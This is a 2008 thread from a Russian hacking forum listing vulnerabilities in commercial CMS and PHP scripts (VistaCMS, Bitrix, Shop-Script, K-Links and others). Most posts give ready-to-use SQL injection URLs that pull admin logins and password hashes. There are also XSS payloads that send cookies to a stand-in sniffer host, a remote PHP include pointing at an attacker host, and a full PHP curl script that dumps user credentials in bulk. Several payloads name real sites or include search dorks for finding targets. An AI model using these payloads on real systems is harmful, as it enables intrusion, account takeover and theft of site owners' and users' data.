Обзор уязвимостей в платных CMS

Discussion in 'Веб-уязвимости' started by Roba, 10 Jan 2008.

  1. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    VistaCMS

    Оф.сайт: http://www.vistacms.ru
    Стоимость (в руб.): 13000-42000 o_O
    ------------------------------------------------
    Раскрытие путей:

    http://www.vistacms.ru/modules/kerne'l/
    Code:
    /usr/home/admin/domains/vistacms.ru/public_html/class/page.class.php
    SQL-injection

    Администраторская панель:

    Code:
    http://www.vistacms.ru/admin/
    Логин: 1' or 1=1/*
    Пароль: antichat.ru

    Клиенты:
    Code:
    http://www.vistacms.ru/clients/
    Автор: ZAMUT (c)

    P.S.
    Уязвимость в авторизации, была замечена не везде. С чем это связано не знаю, про версию CMS ничего не говориться.
     
    #1 Roba, 10 Jan 2008
    Last edited: 10 Jan 2008
    6 people like this.
  2. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    UMI.CMS

    Оф.сайт: www.umi-cms.ru
    Стоимость (в руб.): 2990-29990
    ------------------------------------------
    XSS(Активная)

    Настройки ->

    Уязвимые поля:
    Фамилия
    Имя
    Отчество

    Code:
    <script>alert(document.cookie)</script>
    Автор: ZAMUT (c)
     
    2 people like this.
  3. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Abo Cms

    Уязвимость (sql-inj) обнаружена мной в ?модуле статистики? движка ABO CMS, файл c.php находится обычно в корне веб-директории сайта, реально заюзать уязвимость можно в MySQL 4.1 и выше, так как в более ранних версиях нет возможности использовать подзапросы...

    цена ABO CMS на офф. сайте достигает 30000 рублей.
    На этом движке работают крупные инет-магазины, банки, и т.д.

    вот сплоит ТУТ написанный на php для получения логина и хеша пароля первого пользователя... для получения других данных скрипт не сложно модифицировать...
    Скрипт написан немного корявенько, т.к. писался на скорую руку, так что больно не бейте
     
    #3 Scipio, 10 Jan 2008
    Last edited: 10 Jan 2008
    6 people like this.
  4. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    S.Builder
    Разработчик CMS CBS-Group
    Номер версии S.Builder 3.756
    Лицензия платная
    Сайт www.sbuilder.ru
    Демо-версия www.demo.sbuilder.ru
    Функциональность портал
    Стоимость (в руб.) от 2235 до 44700 руб.

    для теста в вебе создают акк на сутки

    SQL-injection

    20 полей


    системная инфа
    5.0.22- log::dmsb_d7494517@localhost::dmsb_d7494517


    пользователи
    название не смотрел ;) но мона через базу глянуть
     
    _________________________
    #4 halkfild, 13 Jan 2008
    Last edited: 14 Jan 2008
    9 people like this.
  5. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Уязвимости в Bitrix CMS

    Multiple Vulns in Bitrix CMS

    Версия системы и история обновления

    Vulnerable: Bitrix Site Manager 4.1.x

    Exploit:

    Code:
    http://www.bitrix.ru/bitrix/updates/updater.log
    XSS в редиректе:

    Уязвимость присутствует из-за редиректа в форме авторизации во время POST- запроса. Атакующий может подменить значение скрытого поля back_url и перенаправить жертву на вредоносную страницу.

    Раскрытие пути

    Vulnerable: Bitrix Site Manager 4.0.x

    Exploit:

    Code:
    http://host/bitrix/templates/.default/subscribe/subscr_form.php 
    http://host /bitrix/php_interface/dbquery_error.php
    
    PHP Include

    Vulnerable: Bitrix Site Manager 4.0.x

    Exploit:

    Code:
    http://vilcum/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://attackhost/
    
    "http://attackhost/" должен содержать скрипт dbconn.php в /bitrix/php_interface/
     
    3 people like this.
  6. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Amiro.CMS

    сайт: amiro.ru

    XSS (passive)

    Сплоентс:
    Code:
    /saleoffset=saleoffset=<script>alert(document.cookie)</script>
    Code:
    /blabla<script>alert(document.cookie)</script>
    by me +)
     
    1 person likes this.
  7. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    Mix Systems
    vendor:http://mixsystems.com.ua

    price "МИКС-ВИЗИТКА от 500 у. е." -- "МИКС-ПОРТАЛ от 5000 у. е."

    SQL injection

    plugin:katalog
    EX


    Code:
    http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'
    http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+order+by+18/*
    http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
    Code:
    version::user::database
    http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
    users id::login::pwd::email
    http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users/*
    http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users+limit+1,1/*
    
    plugin=photogall
    Ex


    Code:
    http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'&cat=11
    http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'+order+by+12/*&cat=11
    Code:
    version::user::database
    http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10,11,12/*&cat=11
    users id::login::pwd::email
    http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,id,login,pwd,email),5,6,7,8,9,10,11,12+from+ng_users/*&cat=11
    (c) halkfild​


    написал сплоит на CURL /*быстрее чем сокеты*/

    PHP:
    <?

    echo 
    "\n";
    echo 
    "-------------------------Mix Systems CMS--------------------------"."\n";
    echo 
    "-----------------------coded by : halkfild------------------------"."\n";
    echo 
    "------------------------------------------------------------------"."\n";

    if (
    $argc!=4){
      echo 
    " Usage:    php ".$argv[0]." host type num_records\n";
      echo 
    " host:    Your target ex www.target.com \n";
      echo 
    " type:    1 - plugin=katalog bug\n";
      echo 
    "        2 - plugin=photogall bug\n";
      echo 
    " num_records: number or returned records(if 0 - return all)\n";
      echo 
    " example: php script.php site.com 10\n";           
      echo 
    "\n";
    exit;
    }

    $host=$argv[1];
    $type=$argv[2];
    $count=$argv[3];

    if (
    $argv[2]==1) {
      
    $query="index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,CHAR(64),id,login,pwd,email,CHAR(64)),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users+limit+";
      
    $end=",1/*";
    }
    elseif (
    $argv[2]==2) {
      
    $query="index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,CHAR(64),id,login,pwd,email,CHAR(64)),5,6,7,8,9,10,11,12+from+ng_users+limit+";
      
    $end=",1/*&cat=11";
    }
    else {
      echo 
    " incorrect parameter #2=".$argv[2]."\n";
      echo 
    " type:    1 - plugin=katalog bug\n";
      echo 
    "        2 - plugin=photogall bug\n";
      exit;
    }
    $site=$host.'/'.$query;
    $pattern='/@::(\d+)::(.*)::([0-9a-z]{32})::(.*@.*)::@/';
    $i=0;
      
    if(
    function_exists('curl_init'))
    {
      while(
    1) {
        
    $ch curl_init("http://".$site.$i.$end);
       
        
    curl_setopt($chCURLOPT_HEADER,true);
        
    curl_setopt$chCURLOPT_RETURNTRANSFER,true);
        
    curl_setopt($chCURLOPT_TIMEOUT,10);
        
    curl_setopt($chCURLOPT_USERAGENT"Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");  
        
    $res=curl_exec($ch);
        
    $returncode curl_getinfo($ch,CURLINFO_HTTP_CODE);
        
    curl_close($ch);
        if (
    $returncode==404) exit ("Vulnerable script not found. Check your site and settings :| \n");
      
        if(
    preg_match_all($pattern,$res,$out)) {
            echo 
    "| ".$out[1][0]." | ".$out[2][0]." | ".$out[3][0]." | ".$out[4][0]." |\r\n";
            
    $i++;
            
    $out=null;
        }
        else break;
        
        if (
    $count!=&& $i>$count) break;
         }
         echo (
    "Finish. /* ".$i." records*/ \n");
    }
    else
    exit(
    "Error:Libcurl isnt installed \n");

    ?>
     
    _________________________
    12 people like this.
  8. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    77
    Likes Received:
    64
    Reputations:
    7
    SQL inj в Shop-Script

    Shop-Script
    Разработчик Articus dev. group
    Лицензия платная
    Сайт www.shop-script.ru/
    Демо-версия www.demo.shop-script.ru/premium
    Функциональность e-магазин
    Стоимость (в руб.) от 0 до 5450 руб.

    SQL injection

    уязвимый скрипт invoice_phys.php
    уязвимый парамерт order_time=
    данные передаются кодированные в base64; возможен только посимвольный перебор
    Пример уязвимого куска кода:
    PHP:
    $_GET["orderID"] = (int) $_GET["orderID"];
    $sql 'SELECT COUNT(*) FROM '.ORDERS_TABLE.'
    WHERE orderID='
    .$_GET["orderID"].' AND
    order_time="'
    .base64_decode($_GET["order_time"]).'" AND 
    customer_email="'
    .base64_decode($_GET["customer_email"]).'"';
    Пример:
    Code:
    2008-03-16 14:24:11[COLOR=DarkRed]" or 1=1/*[/COLOR]
    Рабочий "код":
    Code:
    2008-03-16 14:24:11[COLOR=DarkRed]" or orderID=1 and ascii(substring((select cust_password from SS_customers where customerID=1),1,1))=97/*[/COLOR]
    который нужно прогнать через base64_encode и передать скрипту.
    Для удачного перебора нужно знать № существующего заказа в базе. Пароль в базе лежит перекодированный в base64, так что в открытом виде

    Поиск: __http://search.icq.com/search/results.php?q=inurl%3A%22index.php%3Ffeedback%3Dyes%22
    Приблизительно 1500 стр...
    Рабочий скрипт для подбора пароля __http://rapidshare.com/files/100018966/SS_brute.rar.html

    Уязвимость не где не вылаживал, античат первый))
     
    #8 big_BRAT, 16 Mar 2008
    Last edited: 16 Mar 2008
    1 person likes this.
  9. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Smart-CMS

    showNewsItem.php

    Exploit:
    Code:
    showNewsItem.php?news_id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,admin_id,user_name,password)+from+administrator--
    Пассы без шифрования
    /admin/index.php
     
  10. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    тамже
    showGallery.php?pagetitle=Gallery&category=1+and+1=0+union+select+concat(user_name,0x3a,password)+from+administrator/*
     
  11. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability
    HTML:
    --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
    --==+            Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability        +==--
    --==+====================================================================================+==--
                              - dreaming of necessity is reason to comply -
    
    
    [+] Info:
    
    [~] Bug found by JosS
    [~] sys-project[at]hotmail.com
    [~] http://www.spanish-hackers.com/
    [~] EspSeC & Hack0wn!.
    
    [~] Software: Pre Job Board (payment)
    [~] HomePage: http://www.preproject.com/
    [~] Exploit: Remote SQL Injection [High]
    [~] Vuln file: JobSearch.php
    
    [~] /jobseekers/JobSearch.php (search module)
    
    [+] Exploit:
    
    [~] ' and 1=2 union all select 1,2,3,4,version(),user(),7,8,9,0,1,2,3,4,5/*
    
    * In memory of rgod
    
    --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
    --==+                                       JosS                                         +==--
    --==+====================================================================================+==--
                                           [+] [The End]
    
    # milw0rm.com [2008-06-14]
    
    milw0rm.com [2008-06-14]
     
  12. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Пассивная XSS в ARTUS-master

    Уязвимо поле поиска.

    например тут
    :)
     
  13. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    CNCat
    XSS:
    Уязвимости в add.php(можно как через GET тк и через POST),index.php и search.php

    Code:
    http://site/add.php?description=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/search.php?q=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
  14. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Не уверен, что платная CMS, но тем не менее :)

    SQL-inj в Siteframe CMS

    В скрипте folder.php, параметре id.

    Code:
    http://site.com/folder.php?id=[sql]
    Боевой пример:

     
    #14 n0ne, 18 Jul 2008
    Last edited: 18 Jul 2008
    1 person likes this.
  15. Corwin

    Corwin Elder - Старейшина

    Joined:
    1 Aug 2008
    Messages:
    0
    Likes Received:
    15
    Reputations:
    0
    K-Links Directory SQL-INJECTION, XSS

    ================================================================================
    || K-Links Directory SQL-INJECTION, XSS
    ================================================================================

    Application: K-Links Directory
    --------------

    Website: http://turn-k.net/k-links
    -----------

    Version: Platinum (All)
    ----------

    About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$.
    ------

    Googledork: Powered By K-Links Directory
    ---------------

    Demo: http://klinksdemo.com
    --------

    Date: 24-07-2008
    -------

    Description:
    ---------------
    Множественные SQL-Injection. Активные и пассивные XSS.


    [ SQL-INJECTION ]

    http://host/report/-1[SQL]
    http://host/visit.php?id=-1[SQL]
    http://host/addreview/-1[SQL]
    http://host/refer/-1[SQL]

    ===>>> Exploit:

    http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8 from platinum_admins where a_id=1/*


    /* Admin Login - http://host/admin

    Далее, через Manage Templates получаем веб-шелл. */

    [ ACTIVE XSS ]

    *) На сайте в поиске вбиваем <script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>

    При просмотре администратором поисковых запросов, его cookies уйдут на сторонний ресурс.

    *) На любую ссылку можно оставить мнение. После чего это сообщение появится у администратора.

    [ PASSIVE XSS :) ]

    http://host/index.php?req=login&redirect=&login_message=<script>alert()</script>


    Author: Corwin
    ---------

    Contact: corwin88[dog]mail[dot]ru
    -----------

    p.s. к сожалению не удалось найти скрипты и провести нормальный аудит кода.
     
  16. Corwin

    Corwin Elder - Старейшина

    Joined:
    1 Aug 2008
    Messages:
    0
    Likes Received:
    15
    Reputations:
    0
    ================================================================================
    || Dating 3 PHP Script SQL-INJECTION
    ================================================================================

    Application: E-topbiz Dating 3 PHP Script
    ------------

    Version: All
    --------

    Website: http://e-topbiz.com/oprema/pages/dating3.php
    --------

    Demo: http://e-topbiz.com/trafficdemos/dating3
    -----

    About: Dating 3 is a very powerful top quality dating php script for webmasters who wish to run an online dating site.
    ------

    Date: 01-08-2008
    -----

    [ VULNERABLE CODE ]

    members/mail.php

    @Line:

    PHP:
      142:     if($action==inbox) { 
      
    143:     $result=mysql_query("select * from mail where UserTo ='$username' ORDER BY SentDate DESC") or die ("cant do it"); 


      
    150:     if($action==veiw) { 
      
    151:     $result=mysql_query("select * from mail where UserTo='$username' and mail_id=$mail_id") or die ("cant do it"); 


    ===>>> Exploit:

    http://host/members/mail.php?action=veiw&mail_id=-1 union select 1,2,3,concat(username,0x3a,password),5,6,7 from admin/*



    Author: Corwin
    -------

    Contact: corwin88[dog]mail[dot]ru
    --------
     
    #16 Corwin, 2 Aug 2008
    Last edited: 2 Aug 2008
    2 people like this.
  17. Corwin

    Corwin Elder - Старейшина

    Joined:
    1 Aug 2008
    Messages:
    0
    Likes Received:
    15
    Reputations:
    0
    ============================
    || PPVCHAT ACTIVE XSS
    ============================

    Application: PPVCHAT
    ------------

    Website: http://ppvchat.com/
    --------

    Version: All
    --------

    About: Pay-per-view adult video chat software. Price 999$.
    ------

    Googledork: Copyright © 2006 PPVChat.com
    -----------

    Date: 05-07-2008
    -----

    Description:
    ------------
    При регистрации новых пользователей/моделей нет фильтрации полей.

    ===>>> Exploit:

    <script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>


    Author: Corwin
    -------

    Contact: corwin88[dog]mail[dot]ru
    --------
     
    1 person likes this.
  18. Corwin

    Corwin Elder - Старейшина

    Joined:
    1 Aug 2008
    Messages:
    0
    Likes Received:
    15
    Reputations:
    0
    ================================================================================
    || E-topbiz Payment Processor 2 SQL-INJECTION
    ================================================================================

    Application: E-topbiz Payment Processor 2
    ------------

    Version: 2.0
    --------

    Website: http://e-topbiz.com/oprema/pages/pproc2.php
    --------

    Demo: http://e-topbiz.com/trafficdemos/payment2/
    -----

    About: The payment processor php script allows you to own and operate your very own paypal type payment processor ------ website and to make a percentage OF EACH AND EVERY TRANSACTION that takes place on your site.

    Date: 01-08-2008
    -----

    [ SQL-INJECTION ]

    http://host/shop.htm?cid=-1[SQL]

    ===>>> Exploit:

    http://host/shop.htm?cid=-1 union select 1,2,concat(user(),0x3a,version())



    Author: Corwin
    -------

    Contact: corwin88[dog]mail[dot]ru
    --------
     
  19. Corwin

    Corwin Elder - Старейшина

    Joined:
    1 Aug 2008
    Messages:
    0
    Likes Received:
    15
    Reputations:
    0
    ================================================================================
    || Recipe Script SQL-INJECTION
    ================================================================================

    Application: Recipe Script
    ------------

    Version: 6.0
    --------

    Website: http://fivedollarscripts.com
    --------

    Demo: http://recipebag.com
    -----

    Date: 03-08-2008
    -----

    [ VULNERABLE CODE ]

    viewrecipe.php

    PHP:
     3:     $sql="select * from recipe where recipeid=$recid";
        
    4:     $res=mysql_query($sql);it");

      259:     
    $result=mysql_query("select from recipescomments where approved='Y' and recipeid=$recid");
      260:     if(mysql_num_rows(
    $result))do it");

    ===>>> Exploit:

    http://host/blabla-0 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2,3,4,5,6,7,8,9 from recipesadmin.php

    // Admin Login - http:/host/admin2

    Greetzz !!! Форб, с отцовством бро! :)!!


    Author: Corwin
    -------

    Contact: corwin88[dog]mail[dot]ru
    --------
     
    #19 Corwin, 3 Aug 2008
    Last edited: 3 Aug 2008
  20. Corwin

    Corwin Elder - Старейшина

    Joined:
    1 Aug 2008
    Messages:
    0
    Likes Received:
    15
    Reputations:
    0
    ================================================================================
    || Bartender Drinks SQL-INJECTION
    ================================================================================

    Application: Bartender Drinks
    ------------

    Version: All
    --------

    Website: http://fivedollarscripts.com
    --------

    Demo: http://fivedollarscripts.com/drinks/
    -----

    Date: 04-08-2008
    -----

    [ VULNERABLE CODE ]

    viewdrinks.php

    PHP:
     6:  if($bgid=="")
            {
            
    $sql="select * from drink order by upldate desc";
            }
            else
            {
       
    12:  $sql="select * from drink where categoryid=$bgid order by upldate desc";
            }

    viewdrink.php

    PHP:
     3:  $sql="select * from drink where drinkid=$recid";
            
    $res=mysql_query($sql);


      
    238:  $result=mysql_query("select * from drinkscomments where approved='Y' and drinkid=$recid");

    ===>>> Exploit:

    http://host/index.php?cmd=6&recid=-1 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2,3 from drinksadmin/*

    // Admin Login - http:/host/admin2


    by me
     
    1 person likes this.